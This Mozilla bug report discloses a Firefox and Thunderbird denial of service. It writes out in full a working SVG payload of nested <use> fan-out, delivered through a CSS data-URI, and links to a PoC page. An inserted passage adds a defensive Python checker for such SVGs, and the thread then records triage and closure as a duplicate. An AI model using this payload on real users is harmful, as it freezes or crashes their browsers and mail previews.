Closed Bug 1909770 Opened 1 year ago Closed 1 year ago

DoS via CSS content:url() with a malicious SVG (incl. Recursion) as Data-URI

Categories: Core :: SVG, defect
Status: RESOLVED DUPLICATE of bug 455100
People: Reporter: mozilla, Unassigned, NeedInfo
Details: Keywords: csectype-dos, reporter-external, Whiteboard: [client-bounty-form]
Attachments: 1 file

It has been discovered that Firefox's rendering engine is vulnerable to client-side Denial-of-Service using the following HTML+CSS construct:

<p></p>
<style>
p {
  content:url('data:image/svg+xml;base64,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');
}
</style>

The malicious SVG decodes to the following:

<svg version="1.2" baseProfile="tiny" xmlns="http://www.w3.org/2000/svg"
    xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" xml:space="preserve">
    <path id="a" d="M0,0"/>
        <g id="b">
            <use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/>
        </g><g id="c">
            <use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/>
        </g><g id="d">
            <use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/>
        </g> <g id="e">
            <use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/>
        </g> <g id="f">
            <use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/><use xlink:href="#e"/>
        </g> <g id="g">
            <use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/><use xlink:href="#f"/>
        </g> <g id="h">
            <use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/><use xlink:href="#g"/>
        </g> <g id="i"><use xlink:href="#h"/>
            <use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/><use xlink:href="#h"/>
        </g> <g id="j">
            <use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/><use xlink:href="#i"/>
        </g>
</svg>

PoCs

Firefox Nightly

  1. Navigate to https://x.lhq.at/p/66a1847e80840
  2. Observe excessive CPU usage

Thunderbird

Similar behaviour has been observed in Thunderbird's preview image, but could not be reproduced with .eml files.

Flags: sec-bounty?
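The SVG above contains no loop; it is a fan-out: one path, referenced nine times by group b, which group c references ten times, and so on through group j. Expanding every `<use>` yields 1 + 9 + 90 + ... + 9·10^8 = 1,000,000,000 path instances from fewer than a hundred elements, which is where the CPU and memory go. The following is an added example, not code from the bug report or from Mozilla: a static check, written for an intake filter (an upload endpoint, a mail client's image preview) that resolves `<use>` references without rendering, counts the leaf shapes the renderer would have to instantiate, and rejects reference cycles (the "Recursion" case in the title). The two embedded SVG documents are constructed for the example; the budget default of 100,000 is an assumed policy value.

```python
"""Static check for <use> fan-out in SVG documents (added example, not code
from the bug report). Counts the leaf shapes a renderer would instantiate
once every <use> is expanded, and raises on reference cycles."""
import xml.etree.ElementTree as ET  # assumption: in production parse with
                                    # defusedxml to also block entity-expansion bombs

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
USE_TAG = "{%s}use" % SVG_NS
DEFS_TAG = "{%s}defs" % SVG_NS
# Elements that produce rendered geometry on their own.
SHAPE_TAGS = {"{%s}%s" % (SVG_NS, t) for t in
              ("path", "rect", "circle", "ellipse", "line",
               "polyline", "polygon", "text", "image")}


class UseCycleError(ValueError):
    """A <use> chain references itself, directly or through other elements."""


def _target_id(use_el):
    """Return the fragment id a <use> points at, or None for non-local refs."""
    href = use_el.get("{%s}href" % XLINK_NS) or use_el.get("href") or ""
    return href[1:] if href.startswith("#") else None


def count_leaf_instances(svg_text):
    """Number of leaf shapes rendered once all <use> references are expanded."""
    root = ET.fromstring(svg_text)
    by_id = {el.get("id"): el for el in root.iter() if el.get("id")}
    memo = {}            # id(element) -> expanded leaf count
    in_progress = set()  # elements on the current expansion path (cycle check)

    def expand(el):
        if el.tag == USE_TAG:
            tid = _target_id(el)
            target = by_id.get(tid)
            if target is None:
                return 0  # dangling or external reference: nothing drawn here
            if id(target) in in_progress:
                raise UseCycleError("<use> cycle through #%s" % tid)
            if id(target) not in memo:
                in_progress.add(id(target))
                memo[id(target)] = expand(target)
                in_progress.discard(id(target))
            return memo[id(target)]
        total = 1 if el.tag in SHAPE_TAGS else 0
        for child in el:
            if child.tag != DEFS_TAG:  # <defs> content renders only via <use>
                total += expand(child)
        return total

    return expand(root)


def within_use_budget(svg_text, max_leaf_instances=100_000):
    """True if the expanded leaf count is within budget and the graph is acyclic."""
    try:
        return count_leaf_instances(svg_text) <= max_leaf_instances
    except UseCycleError:
        return False


# Constructed sample: the report's fan-out pattern cut to three levels of ten,
# which expands to 1 + 10 + 100 = 111 rendered leaf shapes.
SAMPLE_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<path id="a" d="M0,0"/>'
    '<g id="b">' + '<use xlink:href="#a"/>' * 10 + '</g>'
    '<g id="c">' + '<use xlink:href="#b"/>' * 10 + '</g>'
    '</svg>'
)

# Constructed sample with a reference cycle between two groups.
CYCLIC_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<g id="x"><use xlink:href="#y"/></g>'
    '<g id="y"><use xlink:href="#x"/></g>'
    '</svg>'
)

if __name__ == "__main__":
    print("sample expands to", count_leaf_instances(SAMPLE_SVG), "leaf shapes")
    print("sample within budget:", within_use_budget(SAMPLE_SVG, 1000))
    print("cyclic within budget:", within_use_budget(CYCLIC_SVG))
```

Because each referenced element's count is memoised, the check runs in time linear in the number of elements even when the expansion is astronomically large, so it is cheap to apply before handing a document to a renderer that does not impose its own instance limit.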
Attached image svg testcase

As far as I can tell the bug here is the DoS from the SVG file. It does not matter if it's served as a separate SVG document (as in the attachment), as an <IMG> (which restricts some SVG features), from a data: URL, or using CSS.

Are all the parts of your bug summary necessary? If so, please explain how they affect this bug. There are lots of ways to serve content to victims and the CSS and data: URL parts might help you deploy the malicious SVG in some contexts, but they don't appear to have any impact on the DoS itself.

With that understanding (please correct me if I'm wrong about that!) I'll move this over to SVG to see if this is different than the recursion DoSs we know about.

Did reproduce the CPU and memory spike as expected, but Firefox eventually recovered when the parent killed the unresponsive child process.
bp-6c4b8acc-4668-4a99-adf5-2a8680240725

On a machine with much less memory it might have caused problems for the parent process if its allocations started failing, too.

Group: firefox-core-security → core-security
Status: UNCONFIRMED → NEW
Component: Security → SVG
Ever confirmed: true
Flags: needinfo?(mozilla)
Keywords: csectype-dos
Product: Firefox → Core
Group: core-security → layout-core-security

Another content process crash at a different point in SVGUseElement handling, this time a MOZ_CRASH(OOM).
bp-50d45fe4-a7c5-4781-8e61-c2aaa0240725

Group: layout-core-security
Status: NEW → RESOLVED
Closed: 1 year ago
Duplicate of bug: 455100
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-